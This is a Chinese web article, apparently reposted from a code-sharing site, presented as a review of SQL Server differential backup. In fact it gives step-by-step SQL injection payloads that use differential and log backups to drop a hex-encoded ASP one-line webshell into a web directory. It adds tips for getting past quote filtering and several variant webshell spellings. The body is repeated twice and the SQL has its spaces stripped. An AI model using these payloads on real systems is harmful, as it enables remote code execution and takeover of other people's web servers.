复习一下sql server的差异备份
发布日期:2022-02-04 11:11 | 文章来源:源码之家
差异备份的流程大概这样:
1.完整备份一次(保存位置当然可以改)
backupdatabase库名todisk='c:\ddd.bak';-- 2.创建表并插曲入数据
createtable[dbo].[dtest]([cmd][image]);
insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);-- 3.进行差异备份
backupdatabase库名todisk='目标位置\d.asp'WITHDIFFERENTIAL,FORMAT;-- 上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:<%execute(request("a"))%> 如下是网上常见的差异备份代码,思路一样!
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backupdatabase@atodisk=@s createtable[dbo].[xiaolu]([cmd][image]); insertintoxiaolu(cmd)values(0x3C25657865637574652872657175657374282261222929253E) declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT 0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp 声明:方法不是我想的,我只是写工具,默认得到shell是
<%execute(request("a"))%>
=============================================================== 我发现上面代码,有时会无效,而直接用 backupdatabase库名todisk='c:\ddd.bak' createtable[dbo].[dtest]([cmd][image]);
insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E) backupdatabase库名todisk='目标位置\d.asp'WITHDIFFERENTIAL,FORMAT;-- 却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的! 库名必须要有效的库名,一般注入工具都可以得到!如果某站过滤"‘",就要把字符内容转为数值了!
网上还有log增量备份的,我也把他记录一下
=====================================================
另一种log增量备份技术: ';alterdatabasenullsetRECOVERYFULL-- ';createtablecmd(aimage)-- ';backuplognulltodisk='f:\cmd'withinit-- ';insertintocmd(a)values(0x3C2565786563757465287265717565737428226122292
9253EDA)-- ';backuplognulltodisk='备份路径'-- PS:0x3C2565786563757465287265717565737428226122292
9253EDA是一句话小马16进制转来的 说到一句话马,还可以有这么几种写法: a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%executerequest("a")%><%
d).<scriptlanguage=VBScriptrunat=server>executerequest("a")</script>
e).<%25Execute(request("a"))%25>
1.完整备份一次(保存位置当然可以改)
backupdatabase库名todisk='c:\ddd.bak';-- 2.创建表并插曲入数据
createtable[dbo].[dtest]([cmd][image]);
insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);-- 3.进行差异备份
backupdatabase库名todisk='目标位置\d.asp'WITHDIFFERENTIAL,FORMAT;-- 上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:<%execute(request("a"))%> 如下是网上常见的差异备份代码,思路一样!
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backupdatabase@atodisk=@s createtable[dbo].[xiaolu]([cmd][image]); insertintoxiaolu(cmd)values(0x3C25657865637574652872657175657374282261222929253E) declare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000backupdatabase@atodisk=@sWITHDIFFERENTIAL,FORMAT 0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp 声明:方法不是我想的,我只是写工具,默认得到shell是
<%execute(request("a"))%>
=============================================================== 我发现上面代码,有时会无效,而直接用 backupdatabase库名todisk='c:\ddd.bak' createtable[dbo].[dtest]([cmd][image]);
insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E) backupdatabase库名todisk='目标位置\d.asp'WITHDIFFERENTIAL,FORMAT;-- 却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的! 库名必须要有效的库名,一般注入工具都可以得到!如果某站过滤"‘",就要把字符内容转为数值了!
网上还有log增量备份的,我也把他记录一下
=====================================================
另一种log增量备份技术: ';alterdatabasenullsetRECOVERYFULL-- ';createtablecmd(aimage)-- ';backuplognulltodisk='f:\cmd'withinit-- ';insertintocmd(a)values(0x3C2565786563757465287265717565737428226122292
9253EDA)-- ';backuplognulltodisk='备份路径'-- PS:0x3C2565786563757465287265717565737428226122292
9253EDA是一句话小马16进制转来的 说到一句话马,还可以有这么几种写法: a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%executerequest("a")%><%
d).<scriptlanguage=VBScriptrunat=server>executerequest("a")</script>
e).<%25Execute(request("a"))%25>
版权声明:本站文章来源标注为YINGSOO的内容版权均为本站所有,欢迎引用、转载,请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站,禁止在非www.yingsoo.com所属的服务器上建立镜像,否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来,仅供学习参考,不代表本站立场,如有内容涉嫌侵权,请联系alex-e#qq.com处理。
相关文章
关注官方微信